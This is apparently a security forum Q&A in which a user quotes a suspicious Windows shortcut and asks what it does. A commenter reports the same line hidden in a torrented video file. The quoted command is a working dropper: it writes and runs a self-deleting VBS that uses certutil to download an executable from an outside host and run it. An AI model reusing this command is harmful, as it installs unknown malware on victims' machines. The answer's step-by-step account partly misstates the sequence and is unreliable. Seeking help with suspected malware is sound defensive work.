0

I accidentally clicked on a shortcut that is a script.. The shortcut was:

%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?9dKbb7d8ff89ahih=icarian_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"

What does it do and should I be concerned?

FirstTimeHere
  • 1
  • I am very curious too. I just downloaded a video file from a torrent on my Linux computer and it looked suspicious enough that I opened it in Kate and got a very similar line of code to what you're seeing. I would love to see what comes out of this. @OP, did anything happen after running it? – shortstheory May 25 '20 at 01:50
  • The URL I got was https://coid.xyz/?U8778K3JLDhb8f9h=bedivere_%PROCESSOR_ARCHITECTURE% – shortstheory May 25 '20 at 01:56
  • 1
    The question asked in the title and the body of the question are not related. –  May 25 '20 at 09:04
  • We cannot review random code for behavior. As you can imagine, we'd be flooded with random code to review. – schroeder May 25 '20 at 13:16

1 Answers1

1

It seems like it first deleted some visual basic scripts in the directory it was executed in, the scripts had this kind of name: YOUR_USERNAME.vbs

Then it downloaded an executable from this website https://coid.xyz/ which has a name like this: icarian_[x86 OR x64].exe and saved it on you computer as: YOUR_USERNAME.exe

The website had the default Apache landing page, which is unusual for a legit well configured website.

I then runs that executable and places the output in a visual basic script in the format YOUR_USERNAME.vbs and then executes it.

I do not know how dangerous it is, but I would be concerned myself since this is very shady, the website has a certificate issued from lets encrypt but don't know how much that would help.

check the contents of the visual basic script to see what it does, since this just downloads the stuff to your computer and runs it.

Khalid
  • 140
  • 6